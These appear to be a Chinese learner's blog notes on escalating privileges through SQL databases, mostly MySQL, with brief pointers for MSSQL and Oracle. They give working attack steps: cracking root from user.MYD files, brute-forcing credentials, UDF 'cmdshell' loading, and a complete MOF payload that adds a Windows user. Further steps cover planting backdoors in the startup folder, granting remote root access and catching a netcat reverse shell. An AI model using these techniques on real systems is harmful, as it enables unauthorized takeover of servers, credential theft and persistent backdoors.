7.22-27MY&MS&ORA等SQL数据库提权
思路:在利用系统溢出漏洞无果情况下,可以采用数据库提权;
前提:数据库服务开启,且获得数据库最高权限账号密码;除Access数据库外,其他数据库基本都存在提权可能;
Mysql提权
思路: 服务探针-信息收集-提权利用-获取权限;
1、读取默认数据库配置文件;(了解其命名和查找规则)
sql data inc config conn database common include
2、读取数据库存储和备份文件(了解数据库存储格式及对应内容)
@@basedir/data/数据库名.表名.myd
思路:找到mysq'l安装路径下的,data文件夹中的user.MYD文件;
密码存储在mysql.user目录;
直接解密root密码,为root
3、利用脚本暴力破解(是否支持外联及如何开启外联)
默认root不直接外联;
思路: 将爆破脚本传输上网站服务器;
4、远程本地暴力破解,服务器本地暴力破解;
UDF提权(原理mysql调用系统命令函数)
首先:UDF(Userdefined function)是用户自定义函数;
1.mysql<5.1,导出目录c:/windows/system32
2.mysql=>5.1,导出数据库安装目录/lib/plugin;存在于’mysql/lib/plugin’目录下,文件后缀为’.dll’
思路: 判断数据库版本,执行sql语句select version();,之后查看数据库安装目录,执行select @@basedir;
手工创建plugin目录或利用NTFS流创建;
select 'x' into dumpfile '目录/lib/plugin::INDEX_ALLOCATION'
创建udf参数命令create function cmdshell returns string soname 'moonnudf.dll'
MOF提权(基于mysql特性)
原理: 利用mof是windows系统一个文件(在 f),托管对象格式;
1、将mof上传至任意可读可写目录下;
利用代码如下
1 #pragma namespace("\\\\.\\root\\subscription")
2 instance of __EventFilter as $EventFilter
3 {
4 EventNamespace = "Root\\Cimv2";
5 Name = "filtP2";
6 Query = "Select * From __InstanceModificationEvent "
7 "Where TargetInstance Isa \"Win32_LocalTime\" "
8 "And TargetInstance.Second = 5";
9 QueryLanguage = "WQL";
10 };
11 instance of ActiveScriptEventConsumer as $Consumer
12 {
13 Name = "consPCSV2";
14 ScriptingEngine = "JScript";
15 ScriptText =
16 "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")"; # 执行命令需修改
17 };
18 instance of __FilterToConsumerBinding
19 {
20 Consumer = $Consumer;
21 Filter = $EventFilter;
22 };
2.用sql语句将文件导入;
slelct load_file ('上传目录')into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof';
3、等待命令执行成功;
写入启动项(配合操作系统自启动)
win10启动项:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
导出自定义可执行文件到启动目录配置重启执行;
将创建好的后门或执行文件进行服务器启动项写入,配合重启执行;
启动项目录:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup写入后门;
此时若要利用msf进行攻击写入后门提权则必须先开启数据库外联;
GRANT ALL PRIVILEGES ON *.* TO 'username'@'%' IDENTIFIED BY 'password' WITH GRANT OPTION; 其中username和password为账密
反弹shell(基于反弹特性命令)
思路:将数据库权限反弹至服务器中,监听服务器端口即可;
nc -l -p 5577
MSSQL提权,转至
[[2023.7.2-3-4Mssql xp_cmdshell提权]]
上述笔记包含 1.xp_cmdshell提权 和 2.sp_oacreate提权
3、沙盒提权
三、Oracle提权
jsp网站后门不需要提权,自带system
提权工具对应三种模式
1、普通用户
2、DBA用户
3、注入模式
标签:plugin,数据库,27MY,7.22,提权,mysql,目录,mof From: https://www.cnblogs.com/lusang/p/18327439